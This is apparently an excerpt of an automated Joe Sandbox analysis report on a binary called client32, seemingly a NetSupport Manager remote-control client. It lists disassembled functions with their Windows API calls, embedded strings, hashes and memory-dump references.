String ID:
API String ID: 3832070631-0
Opcode ID: 7bedf844c1c4ce4bd4cf84ee3ec1953557bc0074e6a750ec634dd3c80f65a2ee
Instruction ID: bfe7d5249f4b6e1d02486e1e3511efca77028c7631b8c8a816f62769cf0b8b3d
Opcode Fuzzy Hash: 7bedf844c1c4ce4bd4cf84ee3ec1953557bc0074e6a750ec634dd3c80f65a2ee
Instruction Fuzzy Hash: 5D41A1B1A40349ABE710DB74CC85BBAF7F8FB44714F004969E62A97680EBB4A904CB54

Function 110EF790 Relevance: 12.1, APIs: 8, Instructions: 84filememoryCOMMON

Download Yara Rule

APIs

GetFileSize.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,111323D6,00000000,?), ref: 110EF7A8
ReadFile.KERNEL32(00000000,00000000,0000000E,?,00000000,?,111323D6,00000000,?), ref: 110EF7BD
GlobalAlloc.KERNEL32(00000042,-0000000E,00000000), ref: 110EF7DF
GlobalLock.KERNEL32(00000000), ref: 110EF7EC
ReadFile.KERNEL32(00000000,00000000,-0000000E,0000000E,00000000), ref: 110EF7FB
GlobalUnlock.KERNEL32(00000000), ref: 110EF80B
GlobalUnlock.KERNEL32(00000000), ref: 110EF825
GlobalFree.KERNEL32(00000000), ref: 110EF82C

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Global$File$ReadUnlock$AllocFreeLockSize
String ID:
API String ID: 3489003387-0
Opcode ID: dd8f80031ae181a8ed5eea704e92fea1ffadc77db63c751e718b3c2d07927bee
Instruction ID: 752bd59a7f8b278135cd4218b820f19d57544efb101fbb4cfc0774b0aabdd1bf
Opcode Fuzzy Hash: dd8f80031ae181a8ed5eea704e92fea1ffadc77db63c751e718b3c2d07927bee
Instruction Fuzzy Hash: 3721C532A41019AFD704DFA5CA89AFEB7FCEB4421AF0001AEF91997540DF709901C7E2

Function 11143820 Relevance: 12.1, APIs: 8, Instructions: 70windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(?), ref: 1114382B
GetSubMenu.USER32(?,00000000), ref: 11143848
GetMenuItemID.USER32(?,00000000), ref: 11143869
GetMenuItemID.USER32(?,00000001), ref: 11143872
GetMenuItemID.USER32(?,-00000001), ref: 1114387C
DeleteMenu.USER32(?,00000001,00000400), ref: 11143892
GetMenuItemID.USER32(?,00000001), ref: 1114389A
DeleteMenu.USER32(?,-00000001,00000400), ref: 111438B1

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Menu$Item$Delete$Count
String ID:
API String ID: 1985338998-0
Opcode ID: c97f0512c627da812fff9da4634e6cbe95e36318860c0e1331f9727aaf39abe5
Instruction ID: 1fd4eba2895a352ce9ef292ca712417bb50dbed27225d5083b87c16346d81a74
Opcode Fuzzy Hash: c97f0512c627da812fff9da4634e6cbe95e36318860c0e1331f9727aaf39abe5
Instruction Fuzzy Hash: 7611817181422BBBF7059B60CDC8AAFF7BCEF45A19F204229F92592440E7749544CBA1

Function 110CBD30 Relevance: 10.9, APIs: 7, Instructions: 377COMMON

Download Yara Rule

APIs

GetPropA.USER32(00000000), ref: 110CBD78
DefWindowProcA.USER32(?,?,?,?), ref: 110CBE36
GetDlgItem.USER32(?,?), ref: 110CBE53
GetPropA.USER32(00000000,00000000), ref: 110CBE64
GetPropA.USER32(?,00000000), ref: 110CBEA8
GetPropA.USER32(?,?), ref: 110CBEE7

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Prop$ItemProcWindow
String ID:
API String ID: 1997235969-0
Opcode ID: ebf8abf2a496f0ce680a9e25d964baa08689d9a8ae6d48ebf47bc982df061a07
Instruction ID: 81f3594fc952373f31c65604050fddc226e11cf315b99ff1037d9c34014f01c7
Opcode Fuzzy Hash: ebf8abf2a496f0ce680a9e25d964baa08689d9a8ae6d48ebf47bc982df061a07
Instruction Fuzzy Hash: 03B14B763041199FD704DF69E890EBF77A9EBC8760B10866AF945C7380DA31EC51DBA0

Function 11089950 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 228COMMON

Download Yara Rule

APIs

Part of subcall function 11088C40: IsWindow.USER32(?), ref: 11088C5F
Part of subcall function 11088C40: IsWindow.USER32(?), ref: 11088C6D

GetParent.USER32(00000000), ref: 11089996
GetParent.USER32(00000000), ref: 110899A7

Strings

debughlp.$$$, xrefs: 110899AF
.hlp, xrefs: 11089B0E, 11089B3E
WinHelp cmd=%d, id=%d, file=%s, xrefs: 11089A83
.chm, xrefs: 11089AEF, 11089B5D

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ParentWindow
String ID: .chm$.hlp$WinHelp cmd=%d, id=%d, file=%s$debughlp.$$$
API String ID: 3530579756-3361795001
Opcode ID: e5ea565ba7fbe2606c4d89ccc6702d3971483aaf00f07a0d932ac3aaa28a8f5b
Instruction ID: dcd0680657676d00064f31b5da51888b306acc0f32f54203c3ee3b251bcfdaac
Opcode Fuzzy Hash: e5ea565ba7fbe2606c4d89ccc6702d3971483aaf00f07a0d932ac3aaa28a8f5b
Instruction Fuzzy Hash: F5712774E0426AAFDB11DFA4DD81FEFB7E8EF85308F4040A5E909A7241E771A944CB91

Function 1101B530 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 204libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 110DEB60: EnterCriticalSection.KERNEL32(111EE0A4,11018BE8,B6DE5DE1,?,?,?,111CD988,11187878,000000FF,?,1101ABB2), ref: 110DEB61

Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207

std::exception::exception.LIBCMT ref: 1101B776
__CxxThrowException@8.LIBCMT ref: 1101B791
LoadLibraryA.KERNEL32(NSSecurity.dll,00000000,111CD988), ref: 1101B7AE

Part of subcall function 11008DD0: std::_Xinvalid_argument.LIBCPMT ref: 11008DEA

Strings

NsAppSystem Info : Control Channel Sending Command : %d, xrefs: 1101B6E9
NsAppSystem Info : Control Channel Command Sent : %d, xrefs: 1101B70A
NSSecurity.dll, xrefs: 1101B7A3

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalEnterException@8LibraryLoadSectionThrowXinvalid_argument_malloc_memsetstd::_std::exception::exceptionwsprintf
String ID: NSSecurity.dll$NsAppSystem Info : Control Channel Command Sent : %d$NsAppSystem Info : Control Channel Sending Command : %d
API String ID: 3515807602-1044166025
Opcode ID: 7a2bf5ffa17c4bb655a0ec223d7da8cb5fbd7026380f7eb9f48cf61b11f3b8ad
Instruction ID: 97a0dec6d0d64d3c3877ebf05293913b11e378911f3366e288316342895a3808
Opcode Fuzzy Hash: 7a2bf5ffa17c4bb655a0ec223d7da8cb5fbd7026380f7eb9f48cf61b11f3b8ad
Instruction Fuzzy Hash: 72718FB5D00309DFEB10CFA4C844BDDFBB4AF19318F244569E915AB381DB79AA44CB91

Function 1103B606 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 198COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,0000045F,00000000,?,00000000), ref: 1103B75F

Part of subcall function 110CC330: GetCurrentThreadId.KERNEL32 ref: 110CC339

Part of subcall function 110CEEB0: CreateDialogParamA.USER32(00000000,?,1112E709,110CC170,00000000), ref: 110CEF41
Part of subcall function 110CEEB0: GetLastError.KERNEL32 ref: 110CF099
Part of subcall function 110CEEB0: wsprintfA.USER32 ref: 110CF0C8

GetWindowTextA.USER32(?,?,000000C8), ref: 1103B81E

Strings

toastImageAndText.png, xrefs: 1103B7A8
8zi, xrefs: 1103B65C, 1103B707
pcicl32.dll, xrefs: 1103B7EE
Survey, xrefs: 1103B6B0

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CreateCurrentDialogErrorFileLastModuleNameParamTextThreadWindowwsprintf
String ID: 8zi$Survey$pcicl32.dll$toastImageAndText.png
API String ID: 2477883239-3105789041
Opcode ID: f132e5abc1883a39cd4b051e0c656593efb3ab1ea784d836a9ed61e32b276d65
Instruction ID: a37ee32854b15c041e991ad0c80392c526a8d8f631297bf945f8db0117e793ba
Opcode Fuzzy Hash: f132e5abc1883a39cd4b051e0c656593efb3ab1ea784d836a9ed61e32b276d65
Instruction Fuzzy Hash: 3871E27590465A9FE709CF64C8D8FEAB7F5EB48308F1485A9D5198B381EB30E944CB50

Function 11005BB0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 180COMMON

Download Yara Rule

APIs

ReleaseDC.USER32(00000000,?), ref: 11005C19
SetBkMode.GDI32(?,00000001), ref: 11005C5F
InvalidateRect.USER32(00000000,?,00000001), ref: 11005CDA

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

GetDC.USER32(00000000), ref: 11005D08

Part of subcall function 110027F0: SetROP2.GDI32(?,00000007), ref: 11002807
Part of subcall function 110027F0: SelectObject.GDI32(?,?), ref: 1100281A
Part of subcall function 110027F0: GetStockObject.GDI32(00000005), ref: 11002821
Part of subcall function 110027F0: SelectObject.GDI32(?,00000000), ref: 11002829
Part of subcall function 110027F0: Ellipse.GDI32(?,?,?,?,?), ref: 11002847
Part of subcall function 110027F0: SelectObject.GDI32(?,?), ref: 1100285A
Part of subcall function 110027F0: SelectObject.GDI32(?,?), ref: 11002861
Part of subcall function 110027F0: SetROP2.GDI32(?,?), ref: 11002868

Strings

m_hWnd, xrefs: 11005C07, 11005CC6, 11005CF7
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11005C02, 11005CC1, 11005CF2

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Object$Select$EllipseErrorExitInvalidateLastMessageModeProcessRectReleaseStockwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 2286382378-2830328467
Opcode ID: 851854a736d5e0d675b7603e9c0956b36109ed08d14679f865bd8cfd7ab8b5d4
Instruction ID: e9a3d4a4942fbb4b58af945c8767c34c1742e1c8abd3ae03a76f14add5a4435e
Opcode Fuzzy Hash: 851854a736d5e0d675b7603e9c0956b36109ed08d14679f865bd8cfd7ab8b5d4
Instruction Fuzzy Hash: 286137B5A00B069FE764CF69C884BD7B7E5BF89354F10892EE5AE87240DB71B840CB51

Function 110717D0 Relevance: 10.7, APIs: 3, Strings: 4, Instructions: 176COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,B6DE5DE1,75BF7CB0,75BF7AA0,?,75BF7CB0,75BF7AA0), ref: 11071824
LeaveCriticalSection.KERNEL32(?), ref: 11071838

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

LeaveCriticalSection.KERNEL32(00000000,?,?), ref: 110719B1

Strings

queue, xrefs: 1107180A
..\ctl32\Connect.cpp, xrefs: 11071805, 11071910
r->queue != queue, xrefs: 11071915
Register NC_CHATEX for conn=%s, q=%p, xrefs: 11071883

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$EnterErrorExitLastMessageProcesswsprintf
String ID: ..\ctl32\Connect.cpp$Register NC_CHATEX for conn=%s, q=%p$queue$r->queue != queue
API String ID: 624642848-3840833929
Opcode ID: 3f5b2276da03322f2c0effce7b3b564e392dbc3a3c940142a110668279eae6c1
Instruction ID: 4c47afc427fc1e2a273e18b082198136771a32f8cb6ee563f570ada24247464b
Opcode Fuzzy Hash: 3f5b2276da03322f2c0effce7b3b564e392dbc3a3c940142a110668279eae6c1
Instruction Fuzzy Hash: 9B611475E04285AFE701CF64C480FAABBF6FB05314F0485A9E8959B2C1E774E985CBA4

Function 1101FA00 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 151COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 1101FA71

Part of subcall function 111457A0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11195AD8), ref: 1114580D
Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1111025B), ref: 1114584E
Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 111458AB

SHGetFolderPathA.SHFOLDER(00000000,00000005,00000000,00000000,00000000), ref: 1101FB85
GetSaveFileNameA.COMDLG32(?), ref: 1101FBA7
_fputs.LIBCMT ref: 1101FBD3

Strings

ChatPath, xrefs: 1101FB61
X, xrefs: 1101FA81

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: FolderPath$FileName$ModuleSave_fputs_memset
String ID: ChatPath$X
API String ID: 2661292734-3955712077
Opcode ID: 619046a97610daf279de25ffcdf669ee8087747c21fedfcdfd1f4ace001bcd75
Instruction ID: 62a991ad25e6a14efa61ca9757aba7a6120d4dee15c11fe9e7296bfca9a9aea8
Opcode Fuzzy Hash: 619046a97610daf279de25ffcdf669ee8087747c21fedfcdfd1f4ace001bcd75
Instruction Fuzzy Hash: 8451A375D043299FEB21DB60CC84BDABBB8BF45704F1041D9D9186B284EB75EE44CB91

Function 111457A0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 146COMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,11195AD8), ref: 1114580D
SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1111025B), ref: 1114584E
SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 111458AB

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

nsmdir < GP_MAX, xrefs: 111457CC
..\ctl32\util.cpp, xrefs: 111457C7, 11145869
FALSE || !"wrong nsmdir", xrefs: 1114586E

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: FolderPath$ErrorExitFileLastMessageModuleNameProcesswsprintf
String ID: ..\ctl32\util.cpp$FALSE || !"wrong nsmdir"$nsmdir < GP_MAX
API String ID: 3494822531-1878648853
Opcode ID: dac98f511bb11a9ce90c7f7d630102b80d0ad90f7937463059d3242b4e4cb186
Instruction ID: 9d2f35c0ca678663173c9787aa50c950699104b7f99c1a06bf1b906e54d037ce
Opcode Fuzzy Hash: dac98f511bb11a9ce90c7f7d630102b80d0ad90f7937463059d3242b4e4cb186
Instruction Fuzzy Hash: F3515E76D0422E9BEB15CF24DC50BDDF7B4AF15708F6001A4DC897B681EB716A88CB91

Function 1109DDA0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 126COMMON

Download Yara Rule

Strings

name too long, xrefs: 1109DEB4
already opened, xrefs: 1109DDF0
already created, xrefs: 1109DDC7
Local\, xrefs: 1109DE4E

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
